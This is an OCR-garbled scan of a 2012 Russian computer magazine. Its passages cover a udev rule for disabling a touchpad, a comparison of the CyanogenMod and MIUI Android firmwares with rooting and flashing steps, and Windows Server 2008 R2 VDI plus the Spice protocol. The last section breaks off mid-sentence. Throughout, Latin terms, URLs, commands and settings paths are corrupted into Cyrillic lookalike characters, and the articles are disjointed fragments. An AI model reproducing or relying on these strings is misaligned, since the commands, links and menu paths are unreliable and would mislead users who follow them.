АСТІОІ\І== " г етоѵе^ 5^В5У5ТЕМ== ,, іпри1: ,, , КЕШ\ІЕІ_=="тои5е[1-9] " , 
ЕІ\ІѴ{РІ5РІ_АУ}=" :0.0 м ., 

ЕМѴ{ХАЦТНОКІТУ>="/Ііоте/и5ЕКМАМЕ/ .ХаиІИогиѵ" , 
ЕІ\ІУ{ІР_СІА55 }="т оизе" . КМ+= м /изг/Ьіп/зупс1іеп1: ТоисІірасІО-р-Р=0" 

Правила используют утилиту зупсііепі для отключения тачпада, 
если в систему воткнуто устройство с именем типа /сІеѵ/тоизеО, 
/сіеѵ/тоизеі итак далее. 



выводы 



Файловая система зузі'з не только позволила І_іпих сделать 
большой шаг вперед на пути к интеллектуальному десктопу, 
способному к самоконфигурированию, но и дала гикам отличный 
инструмент для управления оборудованием. В этой статье мы рас- 
смотрели лишь часть возможностей комплекса зуз^з+исіеѵ+исіізкз. 
Вероятно, ты сможешь придумать и более изощренные способы 
его использования. ПС 
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ІШІХОШ 



Евгений Зобнин (ехесЬіІ.ги) 




ЗЕЛЕНЫХ РОБОТОВ 



ВЫБИРАЕМ АЛЬТЕРНАТИВНУЮ 
А№ЯОШ-ПРОШИВКУ: СѴАЫ06ЕЫМ00 Ѵ5 МІШ 



Какую альтернативную прошивку 
Апсігоісі выбрать для установки 
на свой девайс? Наверняка ты 
не раз задавался этим вопросом. 
Существует множество самых 
разнообразных прошивок для 
сотен устройств, однако среди 
всего этого разнообразия 
настоящих бриллиантов только 
два: СуаподепМосІ и МИЛ. В чем 
их преимущество, почему 
они получили столь широкое 
распространение, и как 
загрузить их на свой девайс, — 
обо всем этом ты узнаешь прямо 
сейчас. 



ПРЕДИСЛОВИЕ 



Строго говоря, СуаподепМосІ и МІШ не альтер- 
нативные прошивки, а самые настоящие форки 
операционной системы Апсігоісі. Каждый из них 
включает в себя огромное количество измене- 
ний, которые из-за политики Соодіе никогда не 
попадут в официальную версию ОС. Оба проекта 
развиваются большой командой разработчиков, 
которые выполняют порты прошивки на самые 
разнообразные и экзотические устройства 
(например, существует порт СуаподепМосІ на 
смартфон ОеекзрЬопе Опе, — думаю, о нем 
большинство читателей вряд ли слышали). 
Какую прошивку выбрать для своего аппарата 
— решай сам, я же помогу тебе определиться, 
рассказав о возможностях и тонкостях работы 
с каждой из них. 



СУАІЧОбЕММСЮ. ФОРК АЙОВОЮ 
В ЛУЧШИХ ТРАДИЦИЯХ ■■■ 

ОРЕИ 501ІРСЕ НКІ 



Итак, СуаподепМосІ [ суаподептосі.сопп ). На- 
верное, самая популярная прошивка Апсігоісі 
из всех существующих. Ведет свою историю 



почти с момента появления первого смартфона 
под управлением Апсігоісі. Ее создал энтузиаст 
с хсіа-сіеѵеіорегз, скрывающийся под ником 
Суаподеп (настоящее имя — Стив Кондик, не так 
давно он начал работать в компании Затзііпд), 
который взял за основу прошивку, созданную 
^зизРгеке. Изначально СуаподепМосІ пред- 
ставлял собой простую модификацию ориги- 
нального Апсігоісі, установленного на смартфон 
Т-МоЬіІе С1 (Апсігоісі 1.5). Однако позднее, после 
присоединения к Суаподеп других разработчи- 
ков и открытия кода операционной системы, 
она превратилась в настоящий форк, сборка 
которого осуществлялась из собственного репо- 
зитория исходных текстов, включающего в себя 
множество поправок в оригинальные исходни- 
ки, опубликованные боодіе. 

Сегодня за развитие СуаподепМосІ отвечают 
десятки разработчиков со всего мира, а база 
официально поддерживаемых устройств вклю- 
чает в себя 56 моделей смартфонов и планше- 
тов, среди которых есть как топовые девайсы 
типа боодіе ІМехиз 5 и НТС ІпсгесІіЫе, так и бюд- 
жетные устройства вроде НТС ТаМоо и Ниаѵѵеі 



ХАКЕР 04/159/2012 



111 









ІЖІХОІО 




Управляем привилегиями 
приложения в СуаподепМосі 



Настройки производитель- 
ности в СуаподепМосі 



118220. Неофициальные версии прошивки для 
десятков других моделей можно найти на фору- 
мах х^аійеуеіорегзхші. Последняя стабильная 
версия прошивки имеет номер 7.1.0 и основана 
на коде АпбгоісІ 2.3.7. Также ведется работа 
над девятой версией прошивки, базирующей- 
ся на коде АпбгоісІ 4.0.3 (предполагалась, что 
версия 8.0 будет основана на АпбгоісІ 3.0, но 
в связи с отказом боодіе выкладывать ее код 
в свободный доступ образовался разрыв между 
версиями). Несмотря на сырость СуаподепМоб 
9, в Сети уже можно найти множество ее сборок 
для различных устройств. 



отличия и возможности 



Чемже такхорош СуаподепМоб, почему он за- 
служил свою популярность? Ответов здесь два. 
Во-первых, СуаподепМоб создан гиками и для 
гиков, поэтому в его комплекте есть множество 
инструментов, полезных продвинутому поль- 
зователю: например, встроенный 55Н-сервер, 
интерфейстюнинга низкоуровневых параме- 
тров ОС и полноценная консоль с ЬазЬ и ЬизуЬох. 
Во-вторых, в разработке СуаподепМоб при- 
нимаетучастие большое количество независи- 
мых разработчиков, каждый из которых может 
реализовать интересную идею и рассчитывать, 
что его патч будет принят в основную базу 
кода. В результате в СуаподепМоб можно найти 
множество очень оригинальных доработок, 
таких как интерфейс управления питанием 
в выпадающей панели, механизм принудитель- 
ного ограничения приложений в возможностях, 
встроенный эквалайзер и так далее. Плюс ко 
всему СуаподепМоб включае т в себя большое 
количество оптимизаций, которые действитель- 
но поднимают производительность аппарата. 

Вот далеко не полный список того, что 
есть в СуаподепМоб, и чего нет в стандартном 
Апбгоіб: 

• Поддержка/еІс/іпіСб. В СуаподепМоб, каки в 
І_іпих, можно создавать загрузочные скрипты 
длязапуска стороннихдемонов (например, 
затЬа или^рб) и команд (для оптимизации 
управления памятью, например). 

• Возможностьустановки приложений на карту 
памяти. В СуаподепМоб естьсобственный, 
более прозрачный механизм установки при- 
ложений на ех*2-раздел карты памяти. 

• Прошивка включаетвсебя ЬазЬ, ЬизуЬох 





Номеронабиратель и СМС-приложение МІШ 



и збЬ, которые позволяют комфортно работать 
при подключении с помощью 55Н илиабЬ. 

Для запуска 55Н -сервера можно использо- 
вать графический интерфейс. 

• Меню настроек существен но расширено 
и включаетвсебя множество пунктовдля 
тонкоготюнинга ОС. 

• Поддержкатем, разработанныхкомпанией 
Т-МоЬіІе. Темы устанавливаются с помощью 
Апбгоіб МагкеС 

• В состав прошивки включена поддержка 
формата РІ_АС. 

• Доработанное меню перезагрузки, с помо- 
щью которого можно перезагрузитьтелефон 
прямо в консоль восстановления. 

• Поддержка ѴѴі-Рі, ВІиеІооіЬ и ІІ5В-тизеринга 
(эта функциональность появилась в СМ еще 
до ее анонса в Апбгоіб 2.2). 

• Встроенныйэквалайзер, который работает 
вотношении всехприложений. 

• Многочисленныеоптимизации идоработки 
в низкоуровневой части ОС, включая пере- 
работанную библиотеку Віопіс. 

• Механизмстрогихограничений, позволяю- 
щийзапретитьтем или иным приложениям 



выполнятьопасныедля пользователя функ- 
ции (например, отправлятьСМС). 

• Встроенный клиентОрепѴРІЧ, имеющий 
графический интерфейсдля настройки. 

• Доработки в камере (например, функция 
Іар-Іо-Іюсиз), номеронабирателе и СМС- 
приложении. 

• Кнопки управления функциями смартфона 
прямо в выпадающей панели уведомлений. 



УСТАНОВКА 



Впечатляет, не правда ли? Теперь попробуем 
установить это чудо инженерной мысли на свой 
смарт. Что для этого нужно? Все то же самое, 
что и для установки любой другой прошивки: 
гооі-доступ, кастомная консоль восстановления 
(гесоѵегу), сама прошивка и набор закрытых 
Ооодіе-приложений (Маркет, ОтаіІ и прочие). 
Получив гооС мы сможем изменить Ьооі-раздел 
внутренней ІЧАІ\Ю-памяти, что позволитза- 
писать в него модифицированную консоль 
восстановления (которая, в отличие от штатной, 
способна устанавливать прошивки без цифро- 
вой подписи производителя аппарата). 

По умолчанию в Апбгоіб пользователь гооі не 
имеет пароля, но получить его права невозмож- 
но из-за отсутствия в системе инструментов для 
логина (/Ьіп/Іодіп) или изменения ІІЮ (/Ьіп/зи). 
Поэтому систему необходимо поломать с помо- 
щью одного из множества Апбгоіб-эксплойтов. 
Вручную делать это совсем не обязательно: 
для Апбгоіб можно воспользоваться прило- 
жением 2 гооІ ( доо.ді/трбѵѵд ), а в ѴѴіпбоѵѵз или 
І_іпих — ЗирегОпеСІіск ( юо.дІ/НІЫМ ), которое 
можно запустить с помощью топо. Обе софтины 
используют распространенные дыры в Апбгоіб, 
а поэтому способны зарутить множество различ- 
ных устройств. Если не заработают, попробуй 
найти руководство для своего девайса в доодіе. 

Далее необходимо установить кастомный 
гесоѵегу. 5и регОпеСІіск делает это автомати- 
чески, для всего остального есть Рот Мападег, 
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который можно установить прямо через Маркет 
( доо.д І/ѴѴ8сЦ К ). Запустив его, выбираем пункт 
«РІазб СІоскѵѵогкМоб Ресоѵегу». Далее за- 
кидываем на карту памяти прошивку (ее можно 
получить здесь: сѵаподептоб.сот/беѵісез ) 
и приложения Соодіе ( доо.дІ/бОсбТ ). Вновь воз- 
вращаемся в Рот Мападег и перезагружаемся 
в консоль восстановления, нажав «РеЬооІ іпіо 
Ресоѵегу». Оказавшись в консоли восстановле- 
ния (или «инженерном меню», как его любят на- 
зывать студенты технических вузов), нажимаем 
клавишу уменьшения громкости до тех пор, пока 
не дойдем до пункта «ѴѴіре баІаЛасІогу гезеі», 
входим в меню кнопкой включения, выбираем 
«Уез». Возвращаемся на уровень выше, выбира- 
ем «ІпзІаІІ 2 Ір ітот зсісагсі», выбираем прошивку, 
снова нажимаем «Уез». Таким же образом про- 
шиваем приложения Ооодіе. В конце возвраща- 
емся в корень меню и выбираем «РеЬооІ зузіет 
поѵѵ». 



ИСПОЛЬЗОВАНИЕ 



В этом разделе мы поговорим о возможностях 
прошивки. Их много, и почти все — скрыты 
в пользовательских настройках. Мы остановим- 
ся на наиболее интересных и полезных. 

• Переключатели в выпадающей панели. Очень 
удобная вещь, которая перекочевала в МИЛ. 
По умолчанию их четыре, но количество и суть 
переключателей можноизменитьв настрой- 
ках: Мепы -> ЗеШпдз -> СуаподепМоб ЗеШпдз 
-> Іпіегі'асе -> ЫоШісабоп РоѵѵегѴѴібдеІ -> 
ѴѴібдеіВииопз. 



• Для полной выгрузки приложения из памяти 
можно использовать дол гое нажатие на 
кнопку«Назад». Но функцию необходимо 
активироватьв настройках: Мепи -> ЗеШпдз 
-> Арріісабоп ЗеШпдз -> йеѵеіортепі -> Зіор 
аррѵіа Іопд-ргезз. 

• СуаподепМоб поддерживаетжесты наэкране 
блокировки для выполнения различных 
функций илизапуска приложений. Активация 
и управление в настройках: Мепи -> ЗеШпдз 
-> СуаподепМоб ЗеШпдз -> Боскзсгееп -> 
Боскзсгееп дезШгез. 

• Цвети поведение 1_Е0-индикатора можно 
изменить: Мепи ->5еШпдз-> СуаподепМоб 
5еШпдз-> Іпіегі'асе > БЕй поббсабопз. 

• В отличие от АпсІгоісІ, СуаподепМоб способен 
устанавливать на карту памяти любые прило- 
жения, вне зависимости оттого, хотят они это- 
гоили нет. Полезная функция для владельцев 
смартфонов с ограниченным объемом памяти, 
но опасная, так как не все приложения будут 
работать корректно: Мепи -> ЗеШпдз -> 
СуаподепМоб 5еШпдз-> Арріісабоп ЗеШпдз -> 
ІпзІаІІ Іосабоп. 

• СуаподепМоб умеет автоматически об- 
новляться. Для этого активируй соответ- 
ствующий механизм: Мепи -> ЗеШпдз -> 
СуаподепМоб ЗеШпдз -> Зузіет -> Бірбаіе 
поббсабопз. 

• Для показа заряда батареи в процентах 
включи следующую опцию: Мепи -> ЗеШпдз 
-> СуаподепМоб ЗеШпдз -> Зіаіиз Ьагіѵѵеакз 
-> ВаКегу ЗіаШз 5іуІе -> Регсепіаде. 
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• Чтобы переключатьмузыкальныекомпози- 
ции долгим нажатием кнопкиуправления 
громкостью, активируй данную опцию: Мепи 
-> ЗеШпдз -> СуаподепМоб ЗеШпдз -> ІприІ-> 
ѴоІитеЬииоп тизіссопігоіз. 

• Музыкальный проигрывательтакжеподдер- 
живаетуправлениежестами: Плеер -> Мепи 
-> МизісЗеШпдз -> ЕпаЫедезШгез. 

• Чтобызапретитьприложениям выполняете или 
иныедействия (например, отправку СМС или чте- 
ниесписка контактов), открой менюуправления 
приложениями (Мепи ->5ебіпдз->АррІісабопз-> 
МападеАррІісабоп), выбери нужную программу и в 
разделе Регтіззіопзтапни потем возможностям, 
которыеты хотел бы отключить. 

• Для устройств с неудобной или сломанной 
клавишей включения можно настроить вклю- 
чение экрана с помощью клавиши «Меню»: 
Мепи ->5еШпдз -> СуаподепМоб зеШпдз -> 
Боскзсгееп -> ІІпІоск орбопз -> Мепи ипіоск. 

• Чтобы вспискезапущенныхприложений, 
доступном через долгое нажатие клавиши 
«Домой», видетьболее восьми приложений, 
измени значение с помощью настроек: Мепи 
-> СуаподепМоб зеШпдз -> Іприі: ->І_опд ргезз 
боте зеШпдз -> ЫитЬегоІтесепІаррз. 

• Для повышенияскоростизагрузкиотключи 
ее анимацию: Мепи -> СуаподепМоб зеШпдз 
-> Регіюгтапсе-> ОізаЫе Ьооіапітабоп. 

Та м же стоит вкл ючить опцию «Боек боте іп 
тетогу», чтобы запретить выгрузку рабочего 
стола из памяти и избежать связанных с этим 
лагов. 
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ІЖІХОЮ 




МІШ стемой Батзипд баіаху 5 

• Для снятия скриншота нажми кнопку вклю- 
чения итапни по пункту«5сгееп5І~іоІ», он 
будетсохранен на 50-карте, в каталоге йСІМ/ 
ЗсгеепзЬоІз. 

• В состав СуаподепМосІ включено приложение 
ОЗРМападег, позволяющее управлять на- 
стройкам и эквалайзера по отдельности для 
различныхустройств выводазвука (наушни- 
ки, динамик). 



МИЛ. АИРКОЮ ПО-КИТАЙСКИ 



Теперь поговорим о другой прошивке со стран- 
ным названием МІШ (произносится как«Ме 
Ѵои I»). В отличие от СуаподепМосІ, развивае- 
мой сообществом на добровольных началах, 
за разработку МІШ отвечает вполне реальная 
китайская компания Хіаоті ТесЬ ( хіаоті.сот), 
бизнес которой строится на разработке мобиль- 
ных приложений для операционных систем Ю5 
и Апсігоісі. Запущенная в 2010 году, компания 
изначально специализироваласьтолько на 
разработке стека приложений для Апсігоісі, 
включающего в себя музыкальный плеер, гале- 
рею, камеру, номеронабиратель и приложение 
для работы с контактами. Позднее Хіаоті ТесЬ 
объединила этот набор с наработками проекта 
СуаподепМосІ и начала работу над новой про- 
шивкой с полностью переработанным внешним 
обликом, поддержкой тем, собственным домаш- 
ним экраном и многими другими новшествами. 

В результате получилась стильная и неверо- 
ятно удобная в использовании операционная 
система, которая ктекущему моменту не менее 
известна, чем СуаподепМосІ. 




Основной козырь МІШ — это интеграция 
компонентов системы друг с другом и общая за- 
конченность ОС. В отличие от других прошивок, 
она не выглядит недоработанной, здесь все 
подчинено общей идее и работает на удивление 
слаженно. Например, если ты читаешь на сайте 
разработчиков о поддержке тем, то можешь 
быть уверен, что это не просто изменение цвета 
и внешнего облика графических элементов, 
а полная модификация всех графических со- 
ставляющих прошивки, начиная отанимации 
загрузки и заканчивая внешним видом строки 
состояния. И да, конечно же ты получишь в рас- 
поряжение менеджер тем, позволяющий искать, 
просматривать и устанавливать новые темы, ко- 
торые будут автоматически закачаны с сервера 
проекта. То же самое можно сказать и о любом 
другом элементе ОС, включая стандартные при- 
ложения для дозвона и отправки СМС. Трудно 
описать все это по пунктам, поэтому я ограни- 
чусь своеобразным хит-парадом возможностей 
МІШ, которых нет ни в СуаподепМосІ, ни, тем 
более, в стандартном Апсігоісі: 

1. Номеронабиратель с поддержкой Т9-поиска. 
По большому счету, ничем не лучше и не 
хуже РіаІегОпе, ноон включен в комплектОС 
и полностью подчиняется менеджерутем. 

2 . Простое и стильное приложение для работы 
с СМС, которым действительно удобно поль- 
зоваться. Приложение уведомляет о доставке 
СМСадресату, выводиттекстпришедшей СМС 
прямонаэкран, предоставляя возможность 
быстрого ответа, и тоже подчиняетсяустанов- 
леннойтеме. 




3. Встроенная защита отвредоносного ПО. В от- 
личиеот СуаподепМосІ, в котором ограниче- 
ния приложений на выполнение каких-либо 
опасных действий приходится устанавливать 
вручную, МІШуведомляетпользователя опо- 
пытке приложения вы пол нить такое действие 
и предлагает ему выбор «запретить/разре- 
шить».Так, например, если какая-либо про- 
грамма попытается отправитьСМС, наэкране 
появится соответствующее сообщение. 

4 . Встроенный мониторсетевоготрафика. 
Действительно удобное приложение для про- 
смотра статистики использования интернета 
по дням и неделям с возможностьюустановки 
лимита, а также полезной функцией авто- 
отключенияЗС при отсутствии активности. 

В качестве бонуса доступен встроенный 
брандмауэр, позволяющий отключатьинтер- 
нетдля отдельно взятых приложений. 

5 . Встроенный файервол для блокирования 
звонков и СМС-сообщений от особо назой- 
ливых. Вполнестандартный, ноотлично 
функционирующий, в отличие от сторонних 
приложений, половина из которых вообще не 
работает. 

6. Встроенная программа для бэкапа прило- 
жений и настроек (с возможностью хранения 
в облаке). 

7 . Регулярные ОТА-обновления раз в неделю. 
Каждую пятницу смартфон будет предлагать 
установить новую версию прошивки в пол но- 
стьюавтоматическом режиме. 

8 . Синхронизация с облаком. МІШ умеет 
синхронизировать приложения, настройки, 
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• Официальные 
аппараты Соодіе, 
такие как Соодіе 
N8X115 Опе, Соодіе 
ЫехизБ и Батзипд 
Саіаху Ыехиз, 
изначально имеют 
гооі-доступ. 

• Название МІШ 
состоит из двух 
частей: МІ, которая 
значит МоЫІе 
Іпіегпеі (или, как 
это ни странно, 
МІ55Іоп Ітро55ІЫе), 

и III — ІІзег Іпіегіасе. 
Таким образом 
в совокупности 
название можно 
перевести как 
«интерфейс 
для мобильного 
интернета». 



МІШ со стандартной темой 



контакты, бэкапы и прочее с собственным 
облачным сервисом. 

9 . Возможность изменения размера шрифта 
сразу для всех приложений. Одна из тех 
функций, которой так не хватает в стан- 
дартном АпсІгоісІ. 

10. Менеджер запущенных приложений с воз- 
можностью выгрузки из памяти. 

К сожалению, не обошлось и без ложки 
дегтя. Многие пользователи упрекают 
разработчиков МІШ в слишком большой 
похожести прошивки на і 05, операционную 
систему іРЬопе, и с ними трудно не согла- 
ситься. МІШ просто пропитана духом і 05, 
он здесь везде: в меню, иконках, каждая из 
которых обрамляется в квадрат со ско- 
шенными углами, цветовой схеме и многих 
других элементах. Даже стандартный до- 
машний экран выполнен в стиле і 05: меню 
приложений в нем нет, все установленные 
программы сразу попадают на рабочий 
стол, при заполнении которого создается 
новый, а затем — еще один, и так далее. Так 
что, установив сотню программ, ты будешь 
тратить время в основном на то, чтобы про- 
кручивать рабочие столы в поисках нужной 
софтины (справедливости ради стоит ска- 
зать, что установить альтернативный лончер 
система все-таки позволяет). 

Второй недостаток МІШ состоит в ори- 
ентированности на рядового пользователя. 
Здесь нет ни продвинутых настроек, ни ззЬ 
в комплекте, ни, тем более, поддержки уста- 
новки приложений на ех*2-раздел. Красиво, 
ярко, удобно, но слишком скучно для тех, кто 
любит поковырять ОС и общается с зеленым 
роботом на ты. 



УСТАНОВКА 



Установка МІШ на смартфон почти полно- 
стью аналогична установке СуаподепМосІ, 
за исключением того, что приложения 
Ооодіе, такие как Маркет и бтаіі, уже 
входят в комплект прошивки, и их не нужно 
доустанавливать отдельно. В то же время 
к выбору источника для скачивания следует 
отнестись с осторожностью. Дело в том, 
что в оригинале МІШ поддерживает только 
азиатские языки, так что придется восполь- 
зоваться одной из неофициальных сборок, 
переведенных на другой язык. 

Те, кто предпочитает использовать англо- 
язычные версии ОС, могут скачать прошивку 
с сайта тіиіапсігоісі.сот (смотрим раздел 
РОМз). Всем остальным — добро пожаловать 
на русскоязычный ресурс тіиі.Би, автор 
которого самостоятельно переводит каждую 
новую прошивку на великий и могучий. 

Также нужно быть очень внимательным 
в выборе версии. Здесь все крайне запутано: 
например, текущая стабильная версия имеет 
номер 2.3.7, в то время как разрабатываемая 
бета-версия — 2.1.20, а порт на основе ІС5 
(АпсІгоісІ 4.0) — 2.1.13. В общем, смотри в оба. 



ИСПОЛЬЗОВАНИЕ 



Ничего сложного в общении с МІШ даже для 
ржавого чайника нет. Главное — запомнить, 
что здесь отсутствует меню, и все приложения 
будутустановлены прямо на рабочий стол. Тем 
не менее, есть несколько моментов, знание 
которых сильно упрощаетжизнь. Итак, хит- 
парад скрытых возможностей МІШ. 

1. Для отключения звука звонка просто по- 
ложи смартфон экраном вниз. 

2 . Долгое нажатие на кнопку поиска откроет 



окно голосового поиска. 

3. Долгое нажатие на переключатель в вы- 
падающем меню откроет окно настройки 
соответствующей опции. 

4 . Для снятия скриншота одновременно наж- 
ми кнопку «Меню» и клавишу уменьшения 
громкости. 

5 . Для удаления сообщения в СМС- 
приложении быстро проведи пальцем по 
горизонтальной линии. 

6. Дважды нажми на часы на экране блоки- 
ровки, чтобы получить доступ к медиа - 
проигрывателю. 

7 . Система умеет отображать заряд батареи 

в процентах (5еиіпд5->5у5Іет -> ВаМегу -> 
N оІіГісаІіоп Іпсіісаіог 5іуІе -> Регсепіаде). 

8 . Нажав кнопку «Домой» на экране блоки- 
ровки, ты включишь фонарик. 

9 . Наэ кране блоки ров ки та пнидваразапо 
значку СМС, чтобы прочитать последнее 
сообщение. 

10. Для перемещения иконки на другой 
рабочий стол выбери и удерживай иконку 
одним пальцем, а другим — проматывай 
рабочие столы. 



выводы 



Для многих пользователей СуаподепМосІ 
и МІШ могут стать гораздо лучшим выбором, 
нежели стоковые прошивки смартфонов 
с собственными наработками компаний. 

И они превращаются просто в спасение, когда 
производитель намеренно отказывается от 
обновления своего аппарата до новых версий 
операционной системы. В мире открытых 
исходных кодов всегда найдется разработ- 
чик, готовый выполнить порт или добавить 
функцию, которой так не хватало. НЕ 
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РАЗВОРАЧИВАЕМ 
ИНФРАСТРУКТУРУ 
ѴОІ НАѴѴШ2К8В2 

и иыііх 



С ростом размера сети типичная среда, включающая ОС, 
приложения и данные, разбросанные на множестве компов, 
становится громоздкой для управления, а пользователи 
оказываются привязаны к своему рабочему месту. 

Было предложено несколько технологий, призванных 
решить данную проблему-терминальные серверы 
с централизованным хранением данных, переносимые 
профили, виртуализация ОС. Но в итоге пришли к логическому 
финалу — виртуализации рабочего стола. 
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Рол ь узла виртуализации рабочих столов требует наличия Нурег-Ѵ 



НАСТРОЙКА ѴРІ В ѴѴІЫ2К8Р2 



Наиболее интересные возможности служба ТегтіпаІ Зегѵісез по- 
лучила с выходом ѴѴіп2к8Н2, причем чтобы подчеркнуть значимые 
изменения в функциях, она была переименована в Нетоіе Оезкіор 
Бегѵісез (Н05). В частности, благодаря реализации технологии ѴйІ 
(Ѵігіиаі Оезкіор Іпітазігисіиге) Ѵ\/іп2к8Н2 теперь может являться 
частью инфраструктуры 0аа5 (Оезкіор аз а Зегѵісе). Новая роль 
НО Ѵігіиаіігаііоп Нозі представляет собой сервер с ролью Нурег-Ѵ 
с подготовленными ѴМ, доступ к которым реализуется традици- 
онными средствами Н05 по протоколу НОР. Пользователь вместо 
доступа к отдельному приложению получает полноценное (хотя 
и виртуальное) рабочее место, которое настраивает полностью по 
своему вкусу и в соответствии со своими задачами. Подключаться 
к своему рабочему столу он может практически с любого устрой- 
ства, интегрированного в сеть — тонкого клиента, ноутбука, ПК или 
смартфона. Системные требования к клиентскому ПК минимальные. 

Внешне Т5/Н05 от ѴйІ для пользователя мало чем отличается, 
но переход к последнему имеет ряд плюсов — каждый получает 
персональный набор ОС и приложений, сбои и вирусы не окажут 
влияния на другие системы. Администратор четко устанавливает 
ресурсы, чтобы восстановить работоспособность, понадобится пара 
минут, упрощено хранение данных, обновление и распределение 
лицензий ПО. Нужен новый рабочий стол - пожалуйста: одно дви- 
жение мышкой, и пользователь уже может работать. 

Виртуальные рабочие столы могут быть: 

• РегзопаІ Ѵігіиаі йезкіорз — персональными, когда каждый 
пользователь получает индивидуальный образ ОС с полным до- 
ступом, может настраивать рабочую среду по своему усмотрению, 
пользовательские да иные хранятся в самом Ѵй; 

• Ѵігіиаі МасЫпеРооІ — общий с унифицированными настройками 
и приложениями ѴйІ, пользователь, запрашивая доступ кпулу, 
получаетлюбой свободный десктоп, по окончании работы все 
данныеи настройки в образе не сохраняются. 

Персональный и общий Ѵй создаются из заранее подготов- 
ленных администратором наборов образов и отличаются лишь на- 
значением и возможностью сохранения изменений. Общий рабочий 
стол удобен, когда требуется временный доступ (например, при 
обучении, семинарах), или когда данные хранятся централизован- 
но, а для их обработки используются специфические приложения, 
не требующие подстройки на клиентской стороне. Если сеанс не 
заканчивается, а просто производится отключение от общего Ѵй, 
то все данные сохраняются, и пользователь может в любой момент 
вернуться к работе. Еще один важный момент: кактолько поль- 




Настройка личного виртуального рабочего стола в «Свойствах» пользователя Ай 

зователь закончил работу, виртуальная машина останавливается 
и больше не расходует ресурсы сервера, хотя при следующем об- 
ращении требуется некоторое время на ее запуск. 

Информация о персональном рабочем столе, назначенном пользова- 
телю, хранится в Ай (при функциональном уровне домена ѴѴіп2к8Н2), 
посмотреть и скорректировать ее можно в свойствах учетной записи 
(«Асііѵе Оігесіогу -> Пользователи и компьютеры»), во вкладке «Лич- 
ный виртуальный рабочий стол» (РегзопаІ Ѵігіиаі Оезкіор). 

В ѴйІ соединении участвуют все компоненты В05: 

• НОѴѴеЬАссезз — страница входа, предназначенная для подклю- 
чения, выдается список доступных виртуальных рабочих столов 
и приложений; 

• ВОбаІеѵѵау-обеспечивает доступ пользователей, находящихся 
вне корпоративной сети; 

• РйСоппесІіоп Вгокег — управление подключениями кѴМ, ис- 
пользуется для балансировки нагрузки, отслеживаети восста- 
навливает соед и нения; 

• ПетоІеОезкІорБеззіоп Но5І(РШ5Н) — основная роль, обеспечи- 
вающая подключение к удален ному рабочему столу и НетоІеАрр; 

• РОѴігІиаІііаІіопНозІ (НОѴН) — обеспечивает функциональность 
ѴОІдребуетналичия роли Нурег-Ѵ(еслитаковой нет, она будет 
автоматически предложена мастеромустановки); 

• В0І_ісеп5Іпд — хранилищелицензий РОБСАИз, втечение 120 
дней возможна работа втестовом режиме. 

Сам процесс подключения к ѴйІ прозрачен, пользователь выби- 
рает назначенный ему ѴйІ в ПО ѴѴеЬ Ассезз или запускает подготов- 
ленный ПОР файл, все остальное будет выполнено автоматически 
на основе его прав в домене. 

Все настройки ролей производятся в соответствующих консолях: 
«Диспетчер Нурег-Ѵ», «Конфигурация узла сеансов ПОР», «Диспет- 



С ѴОІ ПОЛЬЗОВАТЕЛЬ ПОЛУЧАЕТ 
ВИРТУАЛЬНОЕ РАБОЧЕЕ МЕСТО, 
КОТОРОЕ НАСТРАИВАЕТ ПО 
СВОЕМУ ВКУСУ И В СООТВЕТСТВИИ 
СО СВОИМИ ЗАДАЧАМИ 
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чер подключений кудаленным рабочим столам» и других. В частно- 
сти, в «Диспетчере подключений...» после стандартной настройки 
ролей Нурег-Ѵ и Рй5 следует подключить сервер узла виртуализа- 
ции (АсИ Рй ѴИиаІігаІіоп Нов* Зегѵег) и запустить «Мастер настрой- 
ки виртуальных рабочих столов» (СопПдиге ѴИиаІ йезкіорз ѴѴігагсІ), 
который поможет добавить в список все узлы с Нурег-Ѵ, сервер Рй 
Соппесііоп Вгокег и Рй ѴѴеЬ Ассевз. Теперь осталось лишь назначить 
пользователям виртуальный десктоп. Это можно проделать в свой- 
ствахучетной записи Ай или запустив мастер назначения вирту- 
ального рабочего стола (Аззідп РегзопаІ ѴИиаІ йезкіор). Пул Ѵй 
также создается в Рй Соппесііоп Вгокег при помощи мастера ѴИиаІ 
МасЫпе РооІ Сгеаііоп ѴѴігагсІ, который запросит два параметра — 
имя пула и имя Рй Соппесііоп Вгокег. В настройках всех сервисов 
помогает анализатор соответствия рекомендациям (ВРА). 



5РІСЕ 



Когда ІІІМІХ перешел из эпохи текстовой консоли в эпоху графических 
интерфейсов, вопрос о связи терминалов и серверов, казалось, был 
решен. Графическая подсистема ІІІМІХ была разработана с целью обе- 
спечения сетевого доступа кудаленномудисплею и позволяла сде- 
лать это легко и без лишних хлопот. Админ просто авторизировал воз- 
можных пользователей и запускал на терминалах Х-сервер, который 
принимал запросы на отрисовку графики от приложений, работающих 
на мэйнфрейме. Простая и понятная схема, превосходно работаю- 
щая в 80-х. Сегодня доступ к удаленному рабочему столу с помощью 
Х-протокола просто бессмысленен. Современные приложения уже не 
используют простые и легковесные команды для отрисовки своего ин- 
терфейса, а работают с графическими буферами, постоянно посылая 
Х-серверу команды по их отрисовке и обновлению. Это очень мощный 
и тяжелый поток данных, с которым едва справляются современные 
каналы связи. Видео при таком способе обмена данными, например, 
смотретьуже невозможно. Одним из способов решения этой проблемы 
является переход на более современные, интеллектуальные про- 
токолы доступа к удаленному рабочему столу. 5рісе — один из лучших 
примеров такого протокола. По сути 5рісе является механизмом досту- 
па кудаленным виртуальным машинам, позволяющий пробрасывать 
по сети не только изображение рабочего стола, но и многое другое, 
включая устройства ввода, ІІЗВ-порты и аудиопоток. Передача этих 
данных осуществляется настолько эффективно, что даже на не самом 
высокоскоростном соединении пользователь может свободно поль- 
зоваться всеми услугами современных графических сред, смотреть 
видео, прослушивать музыку и, в общем-то, делать все, что угодно (не 
удастся, пожалуй, разве что играть в современные игры). Сервер 5рісе 
встроен в виртуальную машину и работает на уровне виртуальной ви- 







Мастѳр настройки виртуальных рабочих столов 




деокарты, что позволяет ему применять множество различныхтехник 
оптимизации передачи тяжелых данных, включая сжатие изображе- 
ний, видеопотоков, интеллектуальное распределение нагрузки между 
клиентом и сервером, синхронизация видео- и аудиоданных. Являясь 
протоколом доступа к виртуальным машинам, 5рісе позволяет вы- 
делять для различных групп пользователей виртуальные машины, 
работающие под управлением различных ОС. В целях безопасности 
каждому пользователю можно выделить собственную виртуальную 
машину. В общем и целом инфраструктура сети тонких клиентов, по- 
строенная с использованием 5рісе, будет выглядеть как набор простых 
ПК, снабженных простым 5рісе-клиентом, и мэйнфрейма/кластера, на 
котором крутятся виртуальные машины с поддержкой 5рісе-сервера 
(по одной на каждого клиента или же на группу пользователей). 
Компания РесІ НаС купившая разработчиков 5рісе в 2009 году, хорошо 
